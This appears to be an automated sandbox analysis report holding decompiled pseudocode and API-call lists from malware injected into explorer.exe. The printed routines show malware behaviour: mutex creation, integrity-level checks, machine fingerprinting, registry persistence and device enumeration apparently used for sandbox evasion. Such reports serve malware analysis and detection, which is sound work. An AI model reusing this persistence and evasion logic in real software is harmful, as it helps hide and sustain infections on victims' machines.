0x00772bc2, 0x00772bd4, 0x00772be6, 0x00772bf8, 0x00772c0a, 0x00772c1c, 0x00772c2e, 0x00772c40, 0x00772c52, 0x00772c64, 0x00772c76, 0x00772c88, 0x00772c9a, 0x00772cac, 0x00772cbe, 0x00772cd0, 0x00772ce2, 0x00772cf4, 0x00772d06, 0x00772d18, 0x00772d2a, 0x00772d3c, 0x00772d4e, 0x00772d53, 0x00772d5f, 0x00772d6f, 0x00772d81, 0x00772d93, 0x00772d98, 0x00772da4, 0x00772db4, 0x00772dc6, 0x00772dd8, 0x00772dea, 0x00772dfc, 0x00772e0e, 0x00772e20, 0x00772e32, 0x00772e44, 0x00772e56, 0x00772e68, 0x00772e7a, 0x00772e8c, 0x00772e9e, 0x00772eb0, 0x00772ec2, 0x00772ed4, 0x00772ee6, 0x00772ef8, 0x00772f0a, 0x00772f1c, 0x00772f2e, 0x00772f40, 0x00772f52, 0x00772f64, 0x00772f76, 0x00772f88, 0x00772f9a, 0x00772fac, 0x00772fbe, 0x00772fd0, 0x00772fda, 0x00772fe0, 0x00772ff0, 0x00772ff5, 0x00772ffb, 0x00773001, 0x00773011, 0x00773016, 0x00773022, 0x00773032, 0x00773044, 0x00773056, 0x00773068, 0x0077307a, 0x0077308c, 0x0077309e, 0x007730a3, 0x007730af, 0x007730bf, 0x007730d1, 0x007730e3, 0x007730f5, 0x00773107, 0x00773119, 0x0077312b, 0x0077313d, 0x0077314f, 0x00773161, 0x00773173, 0x00773185, 0x00773197, 0x007731a9, 0x007731bb, 0x007731cd, 0x007731df, 0x007731f1, 0x00773203, 0x00773215, 0x00773227, 0x00773239, 0x0077324b, 0x0077325d, 0x0077326f, 0x00773281, 0x00773293, 0x007732a5, 0x007732b7, 0x007732c9, 0x007732db, 0x007732ed, 0x007732ff, 0x00773311, 0x00773323, 0x00773335, 0x00773347, 0x00773359, 0x0077336b, 0x0077337d, 0x00773382, 0x0077338e, 0x0077339e, 0x007733b0, 0x007733c2, 0x007733c7, 0x007733d3, 0x007733e3, 0x007733f5, 0x00773407, 0x0077340c, 0x00773412, 0x00773418, 0x00773428, 0x0077343a, 0x0077344c, 0x00773451, 0x0077345d, 0x0077346d, 0x0077347f, 0x00773484, 0x0077348a, 0x00773490, 0x007734a0, 0x007734b2, 0x007734c4, 0x007734c9, 0x007734d5, 0x007734e5, 0x007734f2, 0x007734f7, 0x00773500, 0x00773506, 0x0077350c, 0x00773512, 0x00773522, 0x00773534, 0x00773546, 0x00773558, 0x0077356a, 0x0077357c, 0x0077358e, 0x007735a0, 0x007735b2, 0x007735c4, 0x007735d6, 0x007735e8, 0x007735fa, 0x0077360c, 0x0077361e, 0x00773630, 0x00773642, 0x00773654, 0x00773666, 0x00773678, 0x0077367d, 0x00773683, 0x00773689, 0x00773699, 0x007736ab, 0x007736bd, 0x007736cf, 0x007736e1, 0x007736f3, 0x00773705, 0x00773717, 0x00773729, 0x0077373b, 0x0077374d, 0x0077375f, 0x00773771, 0x00773783, 0x00773795, 0x007737a7, 0x007737b9, 0x007737cb, 0x007737dd, 0x007737ea, 0x007737ef, 0x007737ef, 0x00773858

    APIs
    • LoadLibraryA.KERNEL32(00771BF0), ref: 00772D59
    • LoadLibraryA.KERNEL32(00771BE8), ref: 00772D9E
    • LoadLibraryA.KERNELBASE(Psapi), ref: 00772FDA
    • LoadLibraryA.KERNELBASE(00771C40), ref: 00772FFB
    • LoadLibraryA.KERNEL32(00771CAC), ref: 0077301C
    • LoadLibraryA.KERNEL32(00771D08), ref: 007730A9
    • LoadLibraryA.KERNEL32(00771C20), ref: 00773388
    • LoadLibraryA.KERNEL32(00771BF8), ref: 007733CD
    • LoadLibraryA.KERNELBASE(00771C28), ref: 00773412
    • LoadLibraryA.KERNEL32(00771EEC), ref: 00773457
    • LoadLibraryA.KERNELBASE(00771C38), ref: 0077348A
    • LoadLibraryA.KERNEL32(00771CA4), ref: 007734CF
    • LoadLibraryA.KERNELBASE(00771EDC), ref: 0077350C
    • LoadLibraryA.KERNELBASE(00771EE4), ref: 00773683
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 505 778d0c-778d4b call 77458c call 772574 call 7744f0 GetCurrentProcess call 7742d4 call 7744f0 516 778d5d-778d63 GetCurrentProcess call 7742d4 505->516 517 778d4d-778d5b call 7741cc 505->517 521 778d68-778d72 516->521 522 778d77-778e3c GetCurrentProcess call 77453c call 7779bc LocalAlloc call 774408 CreateMutexA LocalFree call 771b50 call 778bfc call 777984 call 7789d4 call 777a44 RtlInitializeCriticalSection call 7747ac call 777304 517->522 521->522 543 778e48-778e4c 522->543 544 778e3e-778e43 call 77744c 522->544 545 778e4e-778e52 543->545 546 778e54-778e5e call 77471c 543->546 544->543 545->546 549 778e63-778e67 545->549 546->549 550 778e69-778eb4 call 771308 call 7712dc call 77133c call 77471c 549->550 551 778ed8-778ee3 549->551 578 778eb6-778ec6 call 774a1c 550->578 579 778ec8-778ed3 call 774a1c 550->579 552 778ee5-778ef0 551->552 553 778f00-778f04 551->553 552->553 558 778ef2-778efb call 778cf8 552->558 555 778f23-778f84 call 77744c call 778b98 call 778b6c call 774ba0 call 775468 * 2 call 773b80 call 771308 call 771440 553->555 556 778f06-778f0a 553->556 605 778f86-778f93 call 778064 555->605 606 778f9a-778fa7 call 778064 555->606 556->555 561 778f0c-778f1e call 771308 call 778b6c 556->561 558->553 575 77901f-779072 call 7738dc call 7738ec call 775640 call 771308 call 7784a4 RtlExitUserThread 561->575 578->551 579->551 610 778f98 605->610 609 778fac-778fb3 606->609 611 778fd7-778fe2 609->611 612 778fb5-778fc1 609->612 610->609 613 778fe4-778ff1 611->613 614 779015-77901a call 777474 611->614 612->611 615 778fc3-778fd5 Sleep 612->615 617 779006-779010 call 77471c 613->617 618 778ff3-778ffa 613->618 614->575 615->611 615->615 617->614 618->617 620 778ffc-779000 GetCursorPos 618->620 620->617
    C-Code - Quality: 87%
    			E00778D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
    				intOrPtr _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				void* _v28;
    				struct tagPOINT _v36;
    				struct _SECURITY_ATTRIBUTES _v52;
    				char _v309;
    				void* _t58;
    				intOrPtr _t59;
    				void* _t60;
    				void* _t61;
    				signed int _t62;
    				void* _t65;
    				signed char _t66;
    				CHAR* _t72;
    				void* _t74;
    				intOrPtr _t90;
    				signed int _t92;
    				intOrPtr _t128;
    				signed int _t133;
    				signed int _t139;
    				signed char _t164;
    				void* _t166;
    				void* _t171;
    				intOrPtr _t183;
    				void* _t188;
    				void* _t191;
    
    				_t191 = __eflags;
    				_t166 = __ecx;
    				 *0x77b114 = E0077458C(0);
    				E00772574(_t54 | 0xffffffff); // executed
    				 *0x77a064 = E007744F0(_t191);
    				_t58 = GetCurrentProcess(); // executed
    				_t59 = E007742D4(_t58); // executed
    				 *0x77a068 = _t59;
    				_t60 = E007744F0(_t191);
    				_t192 = _t60 - 0x3c;
    				if(_t60 >= 0x3c) {
    					_t61 = GetCurrentProcess(); // executed
    					_t62 = E007742D4(_t61); // executed
    					__eflags = _t62 - 3;
    					_t2 = _t62 == 3;
    					__eflags = _t2;
    					asm("sbb eax, eax");
    					 *0x77a034 =  ~(_t62 & 0xffffff00 | _t2);
    				} else {
    					_t164 = E007741CC();
    					asm("sbb eax, eax");
    					 *0x77a034 =  ~_t164;
    				}
    				_t65 = GetCurrentProcess(); // executed
    				_t66 = E0077453C(_t65); // executed
    				asm("sbb eax, eax");
    				 *0x77a058 =  ~_t66;
    				E007779BC(_t192);
    				_v28 = LocalAlloc(0, 0x14);
    				E00774408( &_v52, _v28);
    				_t72 =  *0x77a0d8; // 0x771cc8
    				_t74 = CreateMutexA( &_v52, 0, _t72); // executed
    				 *0x77a054 = _t74;
    				LocalFree(_v28);
    				_t77 = _a4;
    				asm("sbb eax, eax");
    				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
    				_t80 = _a4;
    				asm("sbb eax, eax");
    				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
    				_a4 = _a4 + 2;
    				E00771B50(); // executed
    				E00778BFC(); // executed
    				E00777984(); // executed
    				E007789D4(); // executed
    				E00777A44(_t166); // executed
    				 *0x77b408(0x77be04);
    				_t90 = E007747AC(_a4, 0x77b510); // executed
    				 *0x77b514 = _t90;
    				_t92 = E00777304(0x77b61c); // executed
    				_v24 = _t92;
    				asm("sbb eax, eax");
    				if( ~( ~_v24) == 0) {
    					E0077744C(0x77b61c); // executed
    				}
    				if(_v12 != 0 || _v16 != 0) {
    					E0077471C(_a4, 0x2ee0, 0);
    				}
    				if(_v12 != 0) {
    					E00771308( &_v309, _a4);
    					 *((char*)(_t188 + E007712DC( &_v309) - 0x135)) = 0;
    					E0077133C( &_v309, ".lnk");
    					E0077471C( &_v309, 0, 0);
    					if( *0x77a034 == 0) {
    						E00774A1C(0x80000001,  &_v309);
    					} else {
    						E00774A1C(0x80000002,  &_v309);
    					}
    				}
    				asm("sbb eax, eax");
    				if( ~( ~_v12) == 0) {
    					asm("sbb eax, eax");
    					if( ~( ~_v16) == 0) {
    						_t183 =  *0x77b514; // 0x4e600
    						E00778CF8(_a4, _t183);
    					}
    				}
    				if(_v12 == 0 || _v24 == 0) {
    					E0077744C(0x77b61c); // executed
    					E00778B98(0x77b518); // executed
    					E00778B6C(); // executed
    					E00774BA0(0x77b719); // executed
    					 *0x77b780 = E00775468();
    					 *0x77b651 = E00775468();
    					_v8 = E00773B80(5, 0x19, 0xd);
    					E00771308(0x77b752, _v8);
    					E00771440(_v8);
    					__eflags =  *0x77a034;
    					if( *0x77a034 == 0) {
    						__eflags = 0;
    						_t181 =  *0x77a260; // 0x7721a4
    						E00778064(0x80000001, 0, _t181);
    					} else {
    						_t181 =  *0x77a260; // 0x7721a4
    						E00778064(0x80000002, 0, _t181); // executed
    					}
    					__eflags =  *0x77b621;
    					if( *0x77b621 == 0) {
    						L24:
    						asm("sbb eax, eax");
    						__eflags =  ~( ~_v12);
    						if(__eflags == 0) {
    							_t133 =  *0x77b784; // 0xd4
    							__eflags = _t133 &  *0x77a070;
    							if((_t133 &  *0x77a070) != 0) {
    								__eflags =  *0x77b621 - 0x5a;
    								if( *0x77b621 > 0x5a) {
    									GetCursorPos( &_v36);
    								}
    							}
    							_t181 = 0;
    							__eflags = 0;
    							E0077471C(_a4, 0x2ee0, 0);
    						}
    						E00777474(0x77b61c, __eflags);
    						goto L30;
    					} else {
    						_t139 =  *0x77b621; // 0x12c
    						_v20 = _t139;
    						__eflags = _v20;
    						if(_v20 == 0) {
    							goto L24;
    						} else {
    							goto L23;
    						}
    						do {
    							L23:
    							Sleep(0x3e8); // executed
    							_v20 = _v20 - 1;
    							__eflags = _v20;
    						} while (_v20 != 0);
    						goto L24;
    					}
    				} else {
    					_t181 = _a4;
    					E00771308(0x77b518, _a4);
    					E00778B6C();
    					L30:
    					E007738DC(0x77be04);
    					 *0x77c380 = 0;
    					E007738EC(0x77be04);
    					_pop(_t171);
    					E00775640(0x77c384, _t171, _t181);
    					_t128 =  *0x77b64d; // 0x0
    					 *0x77c355 = _t128;
    					E00771308(0x77c254, 0x77b625);
    					E007784A4();
    					_push(0);
    					return RtlExitUserThread();
    				}
    			}

    APIs
      • Part of subcall function 007744F0: GetVersionExA.KERNEL32(0000009C), ref: 0077451A
    • GetCurrentProcess.KERNEL32 ref: 00778D33
      • Part of subcall function 007742D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007742EC
      • Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0077430E
      • Part of subcall function 007742D4: GetLastError.KERNEL32 ref: 00774322
      • Part of subcall function 007742D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00774358
      • Part of subcall function 007742D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0077436E
      • Part of subcall function 007742D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00774393
      • Part of subcall function 007742D4: CloseHandle.KERNEL32(?), ref: 007743F3
    • GetCurrentProcess.KERNEL32 ref: 00778D5D
    • GetCurrentProcess.KERNEL32 ref: 00778D77
      • Part of subcall function 0077453C: GetCurrentProcess.KERNEL32 ref: 00774555
      • Part of subcall function 0077453C: IsWow64Process.KERNELBASE(00000000,?), ref: 0077456F
      • Part of subcall function 007779BC: RtlInitializeCriticalSection.NTDLL(0077BE04), ref: 00777A14
      • Part of subcall function 007779BC: RtlInitializeCriticalSection.NTDLL(0077C234), ref: 00777A2E
    • LocalAlloc.KERNEL32(00000000,00000014), ref: 00778D94
      • Part of subcall function 00774408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0077441F
      • Part of subcall function 00774408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00774437
      • Part of subcall function 00774408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00771CB4,00000001,?,00000000), ref: 00774453
      • Part of subcall function 00774408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774478
      • Part of subcall function 00774408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774498
      • Part of subcall function 00774408: LocalFree.KERNEL32(?), ref: 007744AC
    • CreateMutexA.KERNELBASE(?,00000000,00771CC8), ref: 00778DB4
    • LocalFree.KERNEL32(?), ref: 00778DC3
      • Part of subcall function 00778BFC: RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00778C1B
      • Part of subcall function 00777984: GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,0077B110,?,?,00000000,00000000), ref: 007779A5
      • Part of subcall function 007789D4: GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007789F4
      • Part of subcall function 00777A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00777A67
      • Part of subcall function 00777A44: GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 00777A88
      • Part of subcall function 00777A44: GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 00777AB9
    • RtlInitializeCriticalSection.NTDLL(0077BE04), ref: 00778E0C
      • Part of subcall function 007747AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007747D9
      • Part of subcall function 007747AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007747FB
      • Part of subcall function 007747AC: GetFileSize.KERNEL32(?,00000000), ref: 00774810
      • Part of subcall function 007747AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0077483F
      • Part of subcall function 007747AC: CloseHandle.KERNEL32(?), ref: 00774849
      • Part of subcall function 00777304: RegOpenKeyExA.KERNELBASE(80000002,007721A4,00000000,000F003F,?), ref: 00777331
      • Part of subcall function 00777304: RegOpenKeyExA.ADVAPI32(80000001,007721A4,00000000,000F003F,?), ref: 00777352
      • Part of subcall function 0077471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00774777
      • Part of subcall function 0077471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00774786
      • Part of subcall function 0077471C: CloseHandle.KERNEL32(?), ref: 00774790
      • Part of subcall function 00774A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00774A55
      • Part of subcall function 00778B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00778BB2
      • Part of subcall function 00778B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00778BD6
      • Part of subcall function 00778B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00778B81
      • Part of subcall function 00778B6C: CloseHandle.KERNEL32(?), ref: 00778B8E
      • Part of subcall function 00774BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 00774BC3
      • Part of subcall function 00774BA0: RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00774C01
      • Part of subcall function 00774BA0: GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00774D40
      • Part of subcall function 00775468: GetSystemTime.KERNEL32(?), ref: 00775472
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
      • Part of subcall function 00778064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
      • Part of subcall function 00778064: RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D
    • Sleep.KERNELBASE(000003E8), ref: 00778FC8
    • GetCursorPos.USER32(?), ref: 00779000
      • Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000002,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0077750D
      • Part of subcall function 00777474: RegCreateKeyExA.ADVAPI32(80000001,007721A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00777533
      • Part of subcall function 007738DC: RtlEnterCriticalSection.NTDLL(?), ref: 007738E3
      • Part of subcall function 007738EC: RtlLeaveCriticalSection.NTDLL(?), ref: 007738F3
      • Part of subcall function 00775640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00775664
      • Part of subcall function 00775640: FindFirstFileA.KERNEL32(?,00000080), ref: 00775697
      • Part of subcall function 00775640: FindNextFileA.KERNEL32(000000FF,00000080), ref: 00775825
      • Part of subcall function 00775640: FindClose.KERNEL32(000000FF), ref: 0077583D
      • Part of subcall function 007784A4: Sleep.KERNEL32(00004E20), ref: 00778519
      • Part of subcall function 007784A4: GetTickCount.KERNEL32 ref: 007786EB
      • Part of subcall function 007784A4: Sleep.KERNEL32(00003A98), ref: 00778706
      • Part of subcall function 007784A4: RtlExitUserThread.NTDLL(00000000), ref: 00778879
      • Part of subcall function 007784A4: RtlExitUserThread.NTDLL(00000000), ref: 007788B6
      • Part of subcall function 007784A4: Sleep.KERNEL32(000003E8), ref: 0077895F
    • RtlExitUserThread.NTDLL(00000000), ref: 00779069
      • Part of subcall function 007741CC: GetCurrentThread.KERNEL32 ref: 007741DE
      • Part of subcall function 007741CC: OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
      • Part of subcall function 007741CC: GetLastError.KERNEL32 ref: 007741F4
      • Part of subcall function 007741CC: GetCurrentProcess.KERNEL32 ref: 00774207
      • Part of subcall function 007741CC: OpenProcessToken.ADVAPI32(00000000), ref: 0077420E
      • Part of subcall function 007741CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
      • Part of subcall function 007741CC: CloseHandle.KERNEL32(?), ref: 0077424E
      • Part of subcall function 007741CC: AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
      • Part of subcall function 007741CC: EqualSid.ADVAPI32(?,?), ref: 007742A2
      • Part of subcall function 007741CC: FreeSid.ADVAPI32(?), ref: 007742BE
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 66%
    			E00776ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
    				intOrPtr _v4;
    				void* _v8;
    				void* _v12;
    				struct HINSTANCE__* _v16;
    				signed int _v20;
    				void* _v28;
    				CHAR* _v36;
    				void* _v157;
    				void* _v188;
    				char* __ebp;
    				void* _t115;
    
    				_t115 = __ecx;
    				_t57 = __eax;
    				if(__esi + 1 <= 0) {
    					L7:
    					__eflags =  *(_t115 - 0x45ffffff) & _t57;
    				} else {
    					if(__eflags <= 0) {
    						asm("lock lea eax, [ebp-0x209]");
    						if(E00771110(__eax, _v16) != 0) {
    							_v4 = 0xffffffff;
    						}
    						E00771440(_v16);
    						return _v4;
    					} else {
    						asm("rol esi, 1");
    						asm("sahf");
    						asm("out 0x48, al");
    						asm("salc");
    						asm("sbb [eax], eax");
    						__eax->i = __eax->i + __al;
    						__dh = __dh + __al;
    						asm("repne shl dl, 0x4a");
    						__ebp =  &_a1;
    						_push(es);
    						asm("rol byte [fs:eax], 0x0");
    						_push( &_a1);
    						__ebp = __esp;
    						__esp = __esp + 0xffffff44;
    						__eax = 0;
    						_v16 = 0;
    						__eax =  *0x77a55c; // 0x776ed0
    						_v36 = __eax;
    						__eax = _v36;
    						__eax = LoadLibraryA(_v36); // executed
    						_v20 = __eax;
    						__eax = _v36;
    						__eax = E00771440(_v36);
    						__eflags = _v20;
    						if (_v20 == 0) goto L13;
    						goto L7;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    • LoadLibraryA.KERNELBASE(?), ref: 00776F0B
    • SetupDiGetClassDevsA.SETUPAPI(0077A014,00000000,00000000,00000002), ref: 00776F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00776FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00776FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00776FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00776FF1
    • SetupDiGetClassDevsA.SETUPAPI(0077A024,00000000,00000000,00000002), ref: 00777028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00777056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0077707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00777096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007770A0
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00776EEC(void* __ecx) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				CHAR* _v28;
    				void* _v32;
    				void* _v161;
    				void* _v192;
    				intOrPtr _t54;
    				struct HINSTANCE__* _t57;
    
    				_v8 = 0;
    				_t54 =  *0x77a55c; // 0x776ed0
    				_v28 = E00773F38(_t54);
    				_t57 = LoadLibraryA(_v28); // executed
    				_v12 = _t57;
    				E00771440(_v28);
    				if (_v12 == 0) goto L7;
    			}

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 00776F0B
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    • SetupDiGetClassDevsA.SETUPAPI(0077A014,00000000,00000000,00000002), ref: 00776F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00776FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00776FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00776FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00776FF1
    • SetupDiGetClassDevsA.SETUPAPI(0077A024,00000000,00000000,00000002), ref: 00777028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00777056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0077707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00777096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007770A0
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 91%
    			E00778AA4(void* __edx, void* __eflags) {
    				struct _WNDCLASSEXA _v52;
    				struct tagMSG _v80;
    				char _v97;
    				void* _t14;
    				struct HWND__* _t26;
    
    				E00771164(E007710B4(E00771164(E007710B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
    				E00771258( &_v52, 0x30);
    				_v52.cbSize = 0x30;
    				_v52.hInstance = 0;
    				_v52.lpszClassName =  &_v97;
    				_v52.lpfnWndProc = E00778A48;
    				RegisterClassExA( &_v52);
    				_t26 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0); // executed
    				 *0x77a574 = _t26;
    				if( *0x77a574 != 0) {
    					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
    						TranslateMessage( &_v80);
    						DispatchMessageA( &_v80);
    					}
    				}
    				_push(0);
    				return RtlExitUserThread();
    			}

    APIs
    • RegisterClassExA.USER32(00000030), ref: 00778AF1
    • CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00778B1D
    • TranslateMessage.USER32(?), ref: 00778B37
    • DispatchMessageA.USER32(?), ref: 00778B41
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00778B51
    • RtlExitUserThread.NTDLL(00000000), ref: 00778B5D
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 88%
    			E007742D4(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				void* _v20;
    				long _v24;
    				void** _v28;
    				intOrPtr _v32;
    				char* _v36;
    				intOrPtr* _v40;
    				signed int _t40;
    				signed int _t47;
    				signed int _t59;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_t40 = OpenProcessToken(_v8, 8,  &_v20);
    				asm("sbb eax, eax");
    				if( ~( ~_t40) == 0) {
    					L17:
    					_v12 = _v16;
    					return _v12;
    				}
    				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
    				asm("sbb eax, eax");
    				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
    					L16:
    					CloseHandle(_v20);
    					goto L17;
    				} else {
    					_v28 = E007713DC(_v24);
    					if(_v28 == 0) {
    						goto L16;
    					}
    					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t59) != 0) {
    						_v36 = GetSidSubAuthorityCount( *_v28);
    						if(_v36 != 0 &&  *_v36 > 0) {
    							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
    							if(_v40 != 0) {
    								_v32 =  *_v40;
    								if(_v32 >= 0x2000) {
    									if(_v32 < 0x2000 || _v32 >= 0x3000) {
    										if(_v32 >= 0x3000) {
    											_v16 = 3;
    										}
    									} else {
    										_v16 = 2;
    									}
    								} else {
    									_v16 = 1;
    								}
    							}
    						}
    					}
    					E00771440(_v28);
    					goto L16;
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007742EC
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0077430E
    • GetLastError.KERNEL32 ref: 00774322
      • Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
      • Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00774358
    • GetSidSubAuthorityCount.ADVAPI32(?), ref: 0077436E
    • GetSidSubAuthority.ADVAPI32(?,?), ref: 00774393
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
    • CloseHandle.KERNEL32(?), ref: 007743F3
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 64%
    			E00774408(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x77a0d4; // 0x771cb4
    					_t38 =  *0x77b32c(_t37, 1,  &_v20, 0); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
